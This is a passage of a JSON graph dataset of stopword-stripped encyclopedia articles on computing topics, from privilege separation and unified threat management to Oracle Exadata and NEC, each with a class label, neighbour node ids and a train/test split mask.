abuse department told enforce tos aup unless forced law enforcement second major source controversy comes ahbl shoot sight listing policy commonly used administrators force isps take action entities ahbl considers abusers entities make legal cart00ney threats ahbl similar organizations threatening ahbl lawsuit years december 17 2005 richard scoville operator website free speech store sued ahbl sosdg associated individuals bexar county texas 3.525 million us claiming various damages business suit dismissed prejudice january 6 2006 lack jurisdiction",
    "neighbors": [
      8224,
      5251,
      6762,
      5357,
      8627,
      9909,
      3350
    ],
    "mask": "Test"
  },
  {
    "node_id": 8342,
    "label": 8,
    "text": "Business_process_network:business process network business process networks bpn also referred business service networks business process hubs enable efficient execution multi-enterprise operational processes including supply chain planning execution bpn extends implements organization service-orientation enterprise applications execute processes bpns combine integration services application services often support particular industry process order management logistics management automated shipping receiving others organizations derive primary value e.g. revenue attain goals outside 'four walls enterprise-—by selling consumers b2c businesses b2b thus businesses seek efficiently manage processes span multiple organizations one process supply chain management bpns gaining popularity partly changing nature supply chains supply chains become truly global trends global sourcing offshoring asia india low-cost production regions world continue add complexity effective trading partner management supply chain visibility transition global sourcing challenging companies companies requisite strategies infrastructure extended process control effectively make transition global sourcing majority supply managers continue use mix e-mail phone fax collaborate offshore suppliers—-none standardized easily integrated enable informed business decisions actions distant trading partners introduce new standards new systems multiple time zones new processes different levels technological maturity supply chain bpns help reduce complexity providing common framework information exchange visibility collaboration bpns also increasingly used enable manage operational business process outsourcing bpo functions human resources finance information technology ‘ non-core ’ relative business business functions whereby bpn facilitates collaboration document movement organization outsourcing firm bpns implemented using host technology platforms including limited traditional edi value-added networks vans industry exchanges b2b gateways point point integration brokers vpns mechanisms enable trading partners connect electronically collaborate conduct business amongst bpns accelerated growth web services service-oriented architectures soa technologies simplify integration people processes systems business process networks often managed using multi-tenant architectures rapidly enable seamless many-to-many one-to-many hub-spoke model connectivity trading partners across extended supply chain multi-tenant frameworks also ensure trading partners work single shared set applications collaboration tools hosted network provider mitigating integration barriers hurdles heterogeneous back-end infrastructures systems across trading community vans industry exchanges bring added benefit pre-connected trading partners often ranging tens thousands enable faster trading community implementation lower overall cost manage maintain connections",
    "neighbors": [
      4107
    ],
    "mask": "Test"
  },
  {
    "node_id": 8343,
    "label": 4,
    "text": "Unified_threat_management:unified threat management unified threat management utm approach information security single hardware software installation provides multiple security functions contrasts traditional method point solutions security function utm simplifies information-security management providing single management reporting point security administrator rather managing multiple products different vendors utm appliances gaining popularity since 2009 partly all-in-one approach simplifies installation configuration maintenance setup saves time money people compared management multiple security systems instead several single-function appliances needing individual familiarity attention support network administrators centrally administer security defenses one computer prominent utm brands sophos sonicwall check point utms minimum converged security features like features commonly found utms although utm offers ease management single device also introduces single point failure within infrastructure additionally approach utm may go one basic information assurance security approaches defense depth utm would replace multiple security products compromise utm layer break entire defense-in-depth approach",
    "neighbors": [
      9824,
      10232,
      2213,
      9285,
      10245,
      4843,
      3500,
      5389,
      9053,
      9715,
      3732,
      4471,
      4568,
      569,
      11611,
      5373
    ],
    "mask": "Test"
  },
  {
    "node_id": 8344,
    "label": 4,
    "text": "Privilege_separation:privilege separation computer programming computer security privilege separation technique program divided parts limited specific privileges require order perform specific task used mitigate potential damage computer security vulnerability common method implement privilege separation computer program fork two processes main program drops privileges smaller program keeps privileges order perform certain task two halves communicate via socket pair thus successful attack larger program gain minimal access even though pair programs capable performing privileged operations privilege separation traditionally accomplished distinguishing real user id/group id effective user id/group id using setuid 2 /setgid 2 related system calls specified posix incorrectly positioned gaps allow widespread network penetration many network service daemons specific privileged operation open raw socket internet socket well known ports range administrative utilities require particular privileges run-time well software tends separate privileges revoking completely critical section done change user runs unprivileged account action known dropping root unix-like operating systems unprivileged part usually run nobody user equivalent separate user account privilege separation also done splitting functionality single program multiple smaller programs assigning extended privileges particular parts using file system permissions way different programs communicate operating system scope potential vulnerabilities limited since crash less privileged part exploited gain privileges merely cause denial-of-service attack separation privileges one major openbsd security features implementation postfix focused implementing comprehensive privilege separation solaris implements separate set functions privilege bracketing",
    "neighbors": [
      2825,
      3473,
      5397,
      8725,
      10016,
      6694,
      174,
      7983,
      7601,
      10673,
      2228,
      5179,
      8379,
      4423,
      2253,
      6993,
      5970,
      8787,
      10835,
      1509,
      4071,
      6888,
      2409,
      4972,
      11500,
      5230,
      3700,
      7030,
      1785,
      7804,
      2558
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8345,
    "label": 2,
    "text": "Real-time_clock_alarm:real-time clock alarm real time clock alarm feature used allow computer 'wake shut execute tasks every day certain day sometimes found 'power management section motherboard bios setup however newer bios setups include rtc alarm option although still set within user applications wake lan wake ring ipmi functions could also used start computer turned linux real time clock alarm set retrieved using /proc/acpi/alarm /sys/class/rtc/rtc0/wakealarm alternatively rtcwake utility may used prevents problems using local time instead utc automatically processing /etc/adjtime file systemd used wake system run task specific time microsoft windows different programs could used 'wake computer standby hibernation task scheduler settings power management used 'wake computer run task",
    "neighbors": [
      5312,
      10967,
      1515,
      6797,
      7151,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 8346,
    "label": 4,
    "text": "ScienceLogic:sciencelogic sciencelogic software service vendor produces information technology management monitoring solutions operations cloud computing company product monitoring management system performs discovery dependency mapping monitoring alerting ticketing runbook automation dashboarding reporting networks compute storage applications sciencelogic platform monitors on-premises cloud-based assets enabling customers use public cloud services amazon web services aws microsoft azure google cloud manage hybrid multi-cloud workloads sciencelogic founded reston virginia 2003 dave link christopher cordray richard chart 2005 company tripled revenue growth year-over year triple digit growth 2005-2007 2008 sciencelogic posted 5.9m revenue also 2008 inc. magazine placed sciencelogic annual list america 500 fastest growing private companies 350 also including 42 top 100 services companies year 2009 position list 490 sciencelogic also ranked 59 deloitte 2009 technology fast 500 ranking 2003 2009 sciencelogic overall sales growth 70 2010 sciencelogic received 15 million series funding new enterprise associates 2012 sciencelogic raised additional 15 million funding intel capital 2013 sciencelogic monitoring software chosen deployed whoa networks inc 2014 sciencelogic introduced cloudmapper automatically discovers maps relationships assets public cloud services aws well customers premises hybrid environment dependency mapping enables customers identify non-performing assets environments",
    "neighbors": [
      7248,
      4194,
      1935
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8347,
    "label": 2,
    "text": "GODI:godi godi package management system ocaml programming language provides dependency management ocaml similar way cpan provides package management perl godi derived netbsd pkgsrc system acronym godi simultaneously stands gerd ocaml distribution general ocaml distribution gerd first name project initiator gerd stolpmann last update project discontinued came 2014",
    "neighbors": [
      8582,
      9671,
      2281,
      5067,
      4309
    ],
    "mask": "Test"
  },
  {
    "node_id": 8348,
    "label": 9,
    "text": "AMSRefs:amsrefs amsrefs package extension package latex facilitates creation bibliographies citations latex documents use amsrefs allows retention rich markup makes references easier reuse publishing environments web book journal formats citation services package available free american mathematical society website purpose amsrefs provide simpler flexible way use many bibliography citation features users latex bibtex come expect amsrefs designed encourage preservation structured markup bibliography throughout entire lifetime document rough draft final archival version replacing unstructured .bbl file format latex fully structured format package compatible “ showkeys ” “ hyperref ” “ backrefs ” packages implements functionality “ cite ” package amsrefs provides bibliography style controlled completely latex instead determined partly bibtex style file partly latex data format used database file latex document thus amsrefs-format database valid latex document printed directly also author send article embedded references publisher without loss internal structural information entries possible use amsrefs package without abandoning one ’ existing bibtex database files amsrefs may distributed and/or modified latex project public license either version 1.3c license option later version",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 8349,
    "label": 7,
    "text": "Polish_Grid_Infrastructure_PL-Grid:polish grid infrastructure pl-grid polish grid infrastructure pl-grid nationwide computing infrastructure built 2009-2011 scientific project pl-grid polish infrastructure supporting computational science european research space purpose enable scientific research based advanced computer simulations large-scale computations using computer clusters provide convenient access computer resources research teams also outside communities high performance computing centers operate first decade twenty-first century european countries advanced grid programs created besides european worldwide consolidation took place form various projects concerned grid technology hpc egee e-irg prace deisa omii-europe poland also undertaken efforts build national grid without infrastructure would possible polish scientific communities participate many research programs particularly eu 7th framework programme another reason initiate steps towards polish grid creation fact poland number intensively cooperating geographically dispersed research teams increasing case cooperation tools gathering sharing accumulated knowledge global scale essential 2007 support almost european countries egi design study project created goal prepare rules integration national grids national grid initiatives europe stable production infrastructure european grid initiative would begin operation 2010 helped start work establishing national grid initiative poland already 2007 setting pl-grid consortium pl-grid consortium established five polish supercomputing networking centers 2009-2011 activity consortium supported pl-grid project co-funded european regional development fund within innovative economy operational programme result operation consortium establishment polish grid infrastructure pl-grid formed merger new powerful computational resources purchased installed data centers belonging pl-grid consortium computational resources available polish grid infrastructure pl-grid include end pl-grid project 5.8 pbytes storage capacity 588 tflops computing power one clusters within polish grid infrastructure zeus supercomputer installed academic computer centre cyfronet agh university science technology kraków 2010 2011 2012 efficient supercomputer poland pl-grid infrastructure resources available scientific software packages allow researchers field biology quantum chemistry physics numerical computations simulation conduct large-scale computations adf amber autodock blast blender cfour clustal cpmd dalton fluent gamess gaussian gromacs mathematica matlab meep molpro mopac namd nwchem openfoam pov-ray r turbomole within pl-grid infrastructure available several tools support design running scientific applications distributed computational resources organization computational experiments visualization applications results resources management g-eclipse gridspace2 qosqosgrid migrating desktop aside user-end tools several software packages administrators also developed namely acarm-ng keyfs security-related projects also useful standalone solutions pl-grid contribution open source community creation national grid infrastructure enterprise large potential innovation mentioned government documents setting directions development polish science technology economy fulfill aim „ growth competitiveness polish science ” innovative economy operational program science sector must strengthened provision suitable research base grid infrastructure constituted base specialized systems specific various fields science created involving services tools oriented used types applications polish grid infrastructure continuously maintained extended within plgrid plus project 2012-2014 domain-oriented services resources polish infrastructure supporting computational science european research space – plgrid plus “ important task preparation specific computing environments – called domain grids – i.e. solutions services extended infrastructure including software tailored needs different groups scientists",
    "neighbors": [
      5956,
      1480,
      5833,
      3609,
      10142
    ],
    "mask": "Test"
  },
  {
    "node_id": 8350,
    "label": 8,
    "text": "Zeus_Web_Server:zeus web server zeus web server proprietary web server unix unix-like platforms including solaris freebsd hp-ux linux developed zeus technology software company located cambridge england original authors company founders university cambridge graduates damian reeves adam twiss support aix tru64 mac os x dropped 10 june 2008 new zws releases made since january 2010 company longer offers similar server solution july 2011 company acquired riverbed technology ended support zws november 30 2014 zeus designed high-performance web server commonly used hardware vendors submitting specweb99 benchmarks hardware specweb99 benchmark retired 2005 replaced specweb2005 specweb2005 submissions made using zeus 2008 longer among top performers addition static content serving zeus supported dynamic content via cgi fastcgi apache jserv isapi nsapi mod_perl ssi zeus distributed authentication content zdac proprietary fastcgi-like protocol zeus mainly competed commercial web servers oracle iplanet web server also claimed high degree compatibility apache http server including .htaccess support url rewriting system comparable apache mod_rewrite expectation apache users would migrate zeus server load increased nsapi isapi supported ease migrations microsoft iis sun java system web server",
    "neighbors": [
      1920,
      4485,
      7430,
      9229,
      7567,
      7695,
      1937,
      11154,
      7443,
      1556,
      5397,
      1304,
      7457,
      3746,
      8994,
      2596,
      3237,
      9125,
      11682,
      7338,
      9387,
      44,
      11439,
      10800,
      4658,
      2485,
      1206,
      823,
      6714,
      10815,
      10622,
      1991,
      11134,
      595,
      1363,
      4439,
      3545,
      225,
      865,
      1250,
      2404,
      4837,
      6379,
      9580,
      2287,
      11376,
      8691,
      5492,
      10611,
      11386,
      3966
    ],
    "mask": "Test"
  },
  {
    "node_id": 8351,
    "label": 5,
    "text": "Naver_Whale:naver whale naver whale hangul 네이버 웨일 south korean freeware web browser developed naver corporation also available english became available android april 13 2018 since browser based chromium since inception 2011 google chrome apps compatible browser pages translated naver papago service translate korean japanese many languages naver whale browser extensions accessed whale store",
    "neighbors": [
      513,
      6657,
      9736,
      2579,
      6171,
      9757,
      7713,
      10791,
      9770,
      559,
      4661,
      3639,
      10808,
      3643,
      9275,
      64,
      5707,
      10834,
      6231,
      8281,
      6747,
      1642,
      9834,
      9841,
      115,
      9843,
      119,
      4728,
      637,
      1664,
      2182,
      10910,
      7340,
      4273,
      9394,
      9908,
      185,
      11449,
      4797,
      11466,
      7885,
      11469,
      9424,
      4310,
      2777,
      8923,
      737,
      4326,
      8443,
      9987,
      7943,
      278,
      7965,
      1834,
      7983,
      10057,
      11082,
      2893,
      8557,
      6528,
      3971,
      3462,
      8584,
      7572,
      5026,
      944,
      5054,
      6086,
      4048,
      5078,
      479,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      6133,
      5622,
      5114
    ],
    "mask": "Test"
  },
  {
    "node_id": 8352,
    "label": 3,
    "text": "Index_register:index register index register computer cpu processor register used modifying operand addresses run program typically vector/array operations contents index register added cases subtracted immediate address one part instruction form effective address actual data operand special instructions typically provided test index register test fails increments index register immediate constant branches typically start loop instruction sets allow one index register used case additional instruction fields specify index registers use normally processors allow instruction specify multiple index registers add contents together ibm line computers contents 'd together early computers without form indirect addressing array operations performed modifying instruction address required several additional program steps used computer memory scarce resource computer installations early era well early microcomputers two decades later index registers commonly known b-line early british computers first used british manchester mark 1 computer 1949 general index registers became standard part computers technology second generation roughly 1954–1966 machines ibm 700/7000 mainframe series starting ibm 704 1954 though optional smaller machines ibm 650 ibm 1401 early small machines index registers include an/usq-17 around 1960 9 series real-time computers scientific data systems early 1960s intel 8080 allowed indirect addressing via register first microprocessor true index register appears motorola 6800 similar mos technology 6502 made good use two registers modern computer designs generally include dedicated index registers instead allow general purpose register contain address allow constant value machines contents another register added offset form effective address early computers designed way include pdp-6 ibm system/360 simple example index register use assembly language pseudo-code sums 100 entry array 4-byte words",
    "neighbors": [
      7173,
      9739,
      2066,
      7699,
      5655,
      10779,
      10781,
      6181,
      8231,
      3630,
      6705,
      7218,
      2623,
      2113,
      7234,
      2638,
      3157,
      3175,
      8815,
      7281,
      6268,
      3197,
      7313,
      6815,
      5793,
      6818,
      6821,
      7852,
      9391,
      2224,
      2226,
      7858,
      9911,
      8890,
      4286,
      9932,
      5329,
      10966,
      731,
      11487,
      5862,
      7911,
      10985,
      9964,
      5358,
      1776,
      2805,
      249,
      1798,
      5384,
      1801,
      10508,
      6926,
      6415,
      11539,
      4385,
      2339,
      6950,
      3370,
      11050,
      3886,
      11059,
      309,
      8501,
      5948,
      8514,
      4423,
      1869,
      7505,
      9044,
      344,
      1376,
      10603,
      4465,
      10098,
      10612,
      1399,
      7033,
      1402,
      3457,
      3470,
      5518,
      407,
      409,
      10658,
      9126,
      10669,
      1967,
      2480,
      10675,
      1461,
      1463,
      4030,
      3010,
      453,
      8143,
      466,
      1499,
      7134,
      5090,
      995,
      7653,
      10734,
      6639,
      499,
      4596,
      10746,
      508
    ],
    "mask": "None"
  },
  {
    "node_id": 8353,
    "label": 1,
    "text": "Oracle_Exadata:oracle exadata oracle exadata database machine exadata computing platform specialized optimized running oracle database goal exadata achieve higher performance availability lower cost moving database algorithms intelligence storage networking bypassing traditional processing layers exadata combined hardware software platform includes scale-out compute servers scale-out intelligent storage servers ultra-fast infiniband networking ultra fast nvme flash specialized exadata software wide range shapes price points exadata storage uses high-performance servers store data run exadata software run data-intensive database processing directly shared storage tier exadata debuted 2008 first oracle corporation family engineered systems use corporate data centers deployed private clouds october 2015 exadata became available oracle cloud subscription service known exadata cloud service early 2017 third exadata deployment choice became available exadata cloud customer exadata cloud service technology deployed on-premises behind corporate firewall managed oracle cloud experts like exadata cloud service exadata cloud customer owned managed oracle licensed pay-as-you-go subscription oracle cloud customer program intended bring benefits oracle public cloud still satisfying security regulatory constraints exadata designed optimally run oracle database workload combination workloads oltp application running simultaneously analytics processing platform frequently used consolidate many databases previously running dedicated database servers exadata scale-out architecture naturally suited running oracle cloud computing requirements dynamically grow sometimes shrink historically specialized database computing platforms designed particular workload data warehousing poor unusable workloads oltp exadata optimizations database workloads implemented mixed workloads share system resources fairly resource management features also allow prioritized allocation system resources always favoring workloads servicing interactive users reporting batch even accessing data long running requests characterized data warehouses reports batch jobs analytics reputed run many times faster compared conventional non-exadata database server customer references often cite performance gains 10x greater analytics workloads also use oracle database in-memory option exadata additional acceleration in-memory databases exadata extended take advantage flash memory capacity many times larger capacity dram exadata ’ hybrid columnar compression feature intended reduce storage consumption data warehouses archival data well increase performance reducing amount io transactional oltp workloads exadata benefit incorporation flash memory exadata ’ storage hierarchy automatic tiering data memory flash disk storage special flash algorithms optimize flash response time sensitive database operations log writes demanding oltp all-flash storage eliminates latency disk media completely hardware components make typical database computing platform compute server connected network storage array database software runs compute server sends receives database information storage array network hardware components use standard software protocols talk separation via standard interfaces allows computing platform run wide variety software hardware different vendors application logic processing data performed compute server data must sent approach computing platform used wide range software applications though optimized particular application goal exadata create complete stack software hardware focused oracle database allowed processing moved optimal location exadata processing oracle database requests take advantage software layers hardware design include elements advantageous oracle database applications fast infiniband networking flash memory given importance data storage databases oracle particularly focused optimizing aspect exadata platform oracle wanted storage layer exadata could easily scale parallelize oracle database requests also recognized opportunity storage cooperate processing database requests beyond storing shipping data example rather send entire database table across network compute server find small number records data filtering could done storage resulting records sent across network addition flash memory exadata storage servers also opened range possibilities optimizing performance storage layer time performance capacity flash storage increased rapid rate network became performance bottleneck traditional database platforms exadata offloading database processing exadata storage servers avoided problem foundation exadata exadata storage server invented oracle replace traditional storage array also important oracle ownership main software hardware components exadata enabling changes deeply integrated released coordinated fashion benefit customers ability support entire exadata platform one vendor software enhancements specific exadata achieved better performance areas due integration hardware software example oltp application commits transaction database software request viewed exadata critical operation prioritized accordingly within network storage servers commit request move front less important messages network io queue another example use flash memory caching data accessed analytics applications columnar data format effective analytics workloads exadata moves data row disk flash automatically reformats data columnar format examples require oracle database understand intent application cascade understanding network storage software behave accordingly since exadata debut 2008 least two significant exadata software releases per year delivering dozens smart software enhancements enhancements based smaller number technical foundations explained detailed listing software enhancements grouped value analytics oltp workloads impact availability similar enhancements duplicated platforms require software api modifications integration across database software operating systems networking storage refer exadata documentation data sheet descriptions features exadata compute servers run oracle linux 7.6 operating system oracle database 11g release 2 enterprise edition oracle database 19c enterprise edition exadata system resources optionally virtualized using xen-based oracle vm oracle database options real application clusters multitenant database in-memory advanced compression advanced security partitioning active data guard others optionally available exadata applications certified supported version oracle database automatically compatible exadata additional modifications certifications required database software runs exadata on-premises run exadata cloud service exadata cloud customer addition on-premises software licenses eligible byol bring license transfer oracle cloud cloud customer exadata provides high-speed networks internal external connectivity 40 gigabits per second 40 gbit/s infiniband network used internal connectivity compute storage servers 25 10 1 gbit/s ethernet ports included data center connectivity infiniband network also used cluster interconnect compute servers exadata uses custom-designed database-oriented protocol infiniband network achieve higher performance makes extensive use remote direct memory access rdma improve efficiency avoiding data copies moving data servers exadata also direct-to-wire protocol allows database talk directly infiniband hardware bypassing operating system exadata also takes advantage infiniband lanes network resource management feature prioritize important traffic across network feature oracle database software tags network messages require low latency transaction commits lock messages io operations issued interactive users enabling bypass messages issued less critical high-throughput workloads reporting batch result analogous emergency vehicle siren able move quickly heavy traffic high-priority network messages moved front server network switch storage queues bypassing lower-priority messages resulting shorter predictable response times oracle enterprise manager cloud control em manages oracle software hardware including exadata database machine em integrates built-in exadata management tooling well customers existing systems management helpdesk tools exadata plug-in em provides integrated view compute servers storage servers switches topology also provides discovery monitoring alerting capability exadata systems management exadata cloud service exadata cloud customer platforms managed oracle customers control manage software databases running compute servers exadata cloud platforms include web-based provisioning wizard customers quickly provision chosen exadata system subsequently database instances customers also perform familiar database administration os administration tasks aided cloud automation backup patching upgrades exadata available two models one based two-socket compute servers based eight-socket compute servers two models differ hardware used compute servers networking storage servers software models recent oracle exadata database machine x8 generation introduced april 2019 x8-2 compute servers feature small form factor 1 ru rack unit height employ 2-socket intel xeon processors socket 24 compute cores 48 total cores per compute server memory starts 384 gigabytes gb expanded 1.5 terabytes tb exadata database machine base configuration 2 compute servers 3 storage servers referred quarter rack hardware also available eighth rack configuration half processing half storage capacity database workload and/or data size increases additional compute storage servers may added increase volume work performed parallel using exadata elastic configuration x8-8 compute server uses eight-socket compute servers consume 5 ru height greater memory capacity x8-2 whereas x8-2 compute server contains 48 compute cores x8-8 server contains 192 compute cores allows large database workloads easily scale-up within compute server still supporting exadata ’ scale-out expandability across multiple servers larger memory capacity x8-8 also favors in-memory databases large oltp consolidation data warehouse workloads like x8-2 exadata x8-8 base configuration 2 compute servers 3 storage servers consumes half rack space additional compute storage servers may added rack full three choices exadata storage servers extreme flash ef high capacity hc extended xt extreme flash storage server all-flash storage containing 8 pcie flash drives total 51.2 tb raw storage capacity current x8-2 configuration high capacity storage server current x8-2 configuration contains 12 disks 14 tb total 168 tb raw storage capacity improve io response times high-capacity storage server also employs 25.6 tb pcie flash cache active data blocks exadata ’ smart flash cache smart flash log columnar flash cache write back flash cache features determine use flash addition adding storage servers exadata database machine base configuration storage servers may also acquired added exadata storage expansion racks storage performance specifications full rack exadata configuration follows introduction exadata x8 oracle added exadata storage server extended xt low-cost storage infrequently accessed data xt storage server contains disk capacity x8-2 high capacity storage server contain flash storage require exadata storage server software license architects traditional computing platforms always cope technology change affecting design systems goal eliminate bottlenecks output storage moves network processed compute servers without slowdown solving imbalance generally involves adding faster network connections compute servers advent ultra-fast pcie flash memory nvme flash interface flash memory started became mainstream corporate computing around 2010 cache front hard disks replacement disks entirely every year thereafter flash capacity performance increased significantly 2017 leading-edge flash performance crossed threshold advanced networks unable match performance flash became substantial bottleneck example popular all-flash storage system 480 flash cards rated 75 gb/s data throughput whereas without network bottleneck many flash cards produce 2,600 gb/s data throughput plugging flash directly compute server removes network bottleneck also removes ability share storage multiple compute servers offloading storage exadata way bypass network bottleneck filtering unneeded data storage sending remaining data across network nowiki /nowiki per 1 full rack 8 compute servers 14 storage servers nowiki ** /nowiki per 1 full rack 2 compute servers 14 storage servers prior x5-2 generation exadata systems available fixed-size configurations eighth quarter half full rack sizes x5-2 exadata release january 2015 elastic configurations introduced elastic configuration customer-specified combination database servers storage servers elastic configurations allow individual storage compute servers added base configuration physical rack full example exadata system optimized in-memory database processing could created adding many compute servers maximum memory conversely exadata system optimized large data warehouse could configured adding many high-capacity storage servers ratio compute storage servers vary depending characteristics intended workload elastic configurations may also used scale earlier generation exadata systems using x8-2 servers addition exadata database machines always able span multiple racks using built-in infiniband network connections thus exadata ’ scale-out extends beyond single physical rack oracle corporation releases new generation exadata every twelve eighteen months release oracle refreshes hardware components latest intel xeon processors memory disk flash networking hardware refreshes result performance increases every release exadata software also refreshed generation periodically enhancing combination performance availability security management workload consolidation october 2015 features support oracle cloud introduced emphasis exadata generation described exadata v1 released 2008 focused accelerating data warehousing delivering full throughput storage database per oracle exadata achieved moving database filtering operations storage instead sending data compute servers filtering oracle refers capability exadata smart scan exadata v1 also supported consolidation feature allocating io bandwidth databases workloads called iorm io resource manager exadata v1 available full rack half rack sizes choice high performance high capacity storage servers exadata v2 released 2009 added quarter rack configuration support oltp workloads via flash storage database-aware flash caching exadata v2 also introduced hybrid columnar compression reduce amount storage consumed large data warehousing tables storage indexes exadata v2 increased performance eliminating need read entire regions storage based knowledge data contained region exadata x2-2 third generation released 2010 second model exadata exadata x2-8 introduced x2-8 subsequent “ 8 socket ” exadata models feature intel processors targeted large memory scale-up workloads use flash storage beyond caching began release smart flash logging feature support 10 gigabit per second gb/sec ethernet connectivity also added data security encryption encouraged incorporation hardware decryption exadata x2-2 largely eliminating performance overhead compared software decryption storage expansion rack based exadata x2-2 added 2011 accommodate large fast-growing data warehouses archival databases subsequent 2-socket exadata generations included new storage expansion rack exadata x3-2 x3-8 released 2012 including new eighth rack x3-2 entry-level configuration flash storage capacity quadrupled oltp write throughput reportedly increased 20x via write-back flash cache feature number availability enhancements added bypassing slow failed storage media reducing duration storage server brownouts simplifying replacement failed disks exadata x4-2 released 2013 flash capacity doubled flash compression added effectively doubling capacity network resource management introduced automatically prioritizing critical messages infiniband bandwidth doubled support active/active connections exadata x4-8 released 2014 plus capacity demand licensing io latency capping timeout thresholds exadata x5-2 x5-8 released 2015 major set enhancements flash disk capacity doubled elastic configurations introduced enable expansion one server time virtualization added option exadata along trusted partitions flexible licensing within virtual machine database snapshots exadata storage enabled efficient development testing oracle database in-memory exadata included fault tolerant redundancy high performance exadata storage servers replaced all-flash extreme performance storage servers exadata became first major vendor adopt nvme flash interface columnar flash cache introduced automatically reformat analytics data row format flash ipv6 support completed exadata cloud service launched oracle cloud exadata x6-2 x6-8 released 2016 flash capacity doubled e xafusion direct-to-wire protocol reduced messaging overhead cluster smart fusion block transfer eliminated log write delays oltp applications cluster exadata cloud customer debuted enabling oracle cloud benefits within corporate data centers exadata x7-2 x7-8 released 2017 flash capacity doubled flash cards became hot pluggable online replacement 10 terabyte tb disk drives debuted along 25 gb/sec ethernet connectivity oracle database in-memory processing extended flash storage storage server dram utilized faster oltp exadata x8-2 x8-8 released 2019 exadata storage server extended xt introduced low-cost storage infrequently accessed data 14 terabyte tb disk drives debuted along 60 compute cores exadata storage servers machine learning algorithms added automatically monitor cpu network memory detect anomalies stuck processes memory leaks flaky networks automatically create auto index rebuild drop indexes optimizer statistics also gathered real-time dml executes enhanced security advanced intrusion detection environment aide added detect alert unknown changes system software made",
    "neighbors": [
      3,
      1539,
      4236,
      290,
      8994,
      8871,
      1707,
      5677,
      7983,
      9010,
      9012,
      10553,
      1594,
      10811,
      9665,
      6338,
      6341,
      5833,
      4811,
      597,
      2901,
      1755,
      6107,
      2269,
      5470,
      1250,
      4194,
      10340,
      10090,
      1260,
      3820,
      7022,
      8434,
      1399,
      7802
    ],
    "mask": "None"
  },
  {
    "node_id": 8354,
    "label": 2,
    "text": "Ken_Coar:ken coar ken coar software developer known participation creation apache software foundation coar active open software projects lectures internationally open development methodologies distributed collaboration",
    "neighbors": [
      1026,
      5644,
      4367,
      8848,
      657,
      10642,
      1939,
      2581,
      3478,
      6808,
      7450,
      6302,
      7584,
      802,
      5410,
      6691,
      6947,
      5931,
      8364,
      1717,
      2485,
      823,
      2109,
      11069,
      10687,
      8644,
      10822,
      8263,
      5578,
      843,
      589,
      6352,
      4177,
      11602,
      8787,
      4437,
      6489,
      3802,
      4831,
      9696,
      11232,
      7793,
      1394,
      1396,
      3189,
      11643
    ],
    "mask": "None"
  },
  {
    "node_id": 8355,
    "label": 4,
    "text": "NEC:nec nec world fourth largest pc manufacturer 1990 nec semiconductors business unit worldwide semiconductor sales leader 1985 1990 second largest 1995 one top three 2000 one top 10 2006 remained one top 20 semiconductor sales leaders merging renesas electronics nec member sumitomo group nec 463 2017 fortune 500 list kunihiko iwadare takeshiro maeda established nippon electric limited partnership august 31 1898 using facilities bought miyoshi electrical manufacturing company iwadare acted representative partner maeda handled company sales western electric interest japanese phone market represented walter tenney carleton carleton also responsible renovation miyoshi facilities agreed partnership would reorganized joint-stock company treaty would allow july 17 1899 revised treaty japan united states went effect nippon electric company limited organized day western electric company become first japanese joint-venture foreign capital iwadare named managing director ernest clement carleton named directors maeda mototeru fujii assigned auditors iwadare maeda carleton handled overall management company started production sales maintenance telephones switches nec modernized production facilities construction mita plant 1901 mita shikokumachi completed december 1902 japanese ministry communications adopted new technology 1903 common battery switchboard supplied nec common battery switchboards powered subscriber phone eliminating need permanent magnet generator subscriber phone switchboards initially imported manufactured locally 1909 nec started exporting telephone sets china 1904 1905 iwadare visited western electric u.s. see management production control return japan discontinued oyakata system sub-contracting replaced new system managers employees direct employees company inefficiency also removed production process company paid higher salaries incentives efficiency new accounting cost controls put place time clocks installed 1899 1907 number telephone subscribers japan rose 35,000 95,000 nec entered china market 1908 implementation telegraph treaty japan china also entered korean market setting office seoul january 1908 period 1907 1912 sales rose 1.6 million yen 2 million yen expansion japanese phone service key part nec success period expansion take pause ministry communications delayed third expansion plan phone service march 1913 despite 120,000 potential telephone-subscribers waiting phone installations nec sales fell sixty percent 1912 1915 interim iwadare started importing appliances including electric fans kitchen appliances washing machines vacuum cleaners electric fans never seen japan imports intended prop company sales 1916 government resumed delayed telephone-expansion plan adding 75,000 subscribers 326,000 kilometers new toll lines thanks third expansion plan nec expanded time much rest japanese industry contracted 1919 nec started first association sumitomo engaging sumitomo densen seizosho manufacture cables part venture nec provided cable manufacturing equipment sumitomo densen rights western electrics duplex cable patents also transferred sumitomo densen great kantō earthquake struck japan 1923 140,000 people killed 3.4 million left homeless four nec factories destroyed killing 105 nec engineers workers thirteen tokyo telephone offices destroyed fire telephone telegraph service interrupted damage telephone cables response ministry communications accelerated major programs install automatic telephone switching systems enter radio broadcasting first automatic switching systems strowger-type model made automatic telephone manufacturing co. atm united kingdom nec participated installation automatic switching systems ultimately becoming general sales agent atm nec developed strowger-type automatic switching system 1924 first japan one plants almost leveled kanto earthquake mita plant chosen support expanding production new three-story steel-reinforced concrete building built starting 1925 modeled western electric hawthorne works nec started radio communications business 1924 japan first radio broadcaster radio tokyo founded 1924 started broadcasting 1925 nec imported broadcasting equipment western electric expansion radio broadcasting osaka nagoya marked emergence radio industry nec established radio research unit 1924 nec started developing electron tubes 1925 1930 manufacturing first 500 w radio transmitter provided chinese xinjing station 100 kw radio broadcasting system 1934 photo-telegraphic equipment developed nec transmitted photos accession ceremony emperor hirohito ceremony held kyoto 1928 newspapers asahi shimbun mainichi shimbun competing cover ceremony asahi shimbun using siemens device mainichi planning use french photo-telegraphic equipment end papers acquired used nec product due faster transmission rate higher picture quality 1929 nippon electric provided japan ministry communications a-type switching system first systems developed japan nippon supplied japan ministry communications nonloaded line carrier equipment long distance telephone channels 1937 world war ii described company blackest days history 1938 mita tamagawa plants placed military control direct supervision military officers 1939 nippon electric established research laboratory tamagawa plant became first japanese company successfully test microwave multiplex communications december 22 1941 enemy property control law passed nec shares owned international standard electric corporation ise itt subsidiary western electric affiliate seized capital technical relations abruptly severed munitions company law passed october 1943 placing overall control nec plants military jurisdiction ueno plant leveled military attack march 1945 fire bombings april may heavily damaged tamagawa plant reducing capacity forty percent okayama plant totally destroyed bombing attack june year end war nec production substantially reduced damage facilities material personnel shortages war production slowly returned civilian use nec re-opened major plants end january 1946 nec began transistor research development 1950 started exporting radio-broadcast equipment korea first major postwar contract 